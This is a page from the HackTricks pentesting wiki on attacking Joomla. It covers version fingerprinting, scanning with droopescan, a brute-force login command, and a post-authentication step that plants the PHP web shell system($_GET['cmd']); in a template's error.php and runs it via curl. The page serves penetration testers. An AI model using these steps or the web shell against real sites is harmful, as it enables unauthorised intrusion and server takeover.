Joomla

​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Joomla Statistics
Joomla collects some anonymous usage statistics such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
​
{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}
Enumeration
Discovery/Footprinting
Check the meta
curl https://www.joomla.org/ | grep Joomla | grep generator
​
<meta name="generator" content="Joomla! - Open Source Content Management" />
robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
README.txt
1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Version
In /administrator/manifests/files/joomla.xml _ you can see the version._
In /language/en-GB/en-GB.xml you can get the version of Joomla.
In plugins/system/cache/cache.xml you can see an approximate version.
Automatic
droopescan scan joomla --url http://joomla-site.local/
In 80,443 - Pentesting Web Methodology is a section about CMS scanners that can scan Joomla.
Brute-Force
You can use this script to attempt to brute force the login.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin
RCE
If you managed to get admin credentials you can RCE inside of it by adding a snippet of PHP code to gain RCE. We can do this by customizing a template.
1.Click on Templates on the bottom left under Configuration to pull up the templates menu.
2.Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.
3.Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:
1.system($_GET['cmd']);
4.Save & Close
5.curl -s http://joomla-site.local/templates/protostar/error.php/error.php?cmd=id
​☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥​
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs​
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
JIRA
JSP
Last modified 4mo ago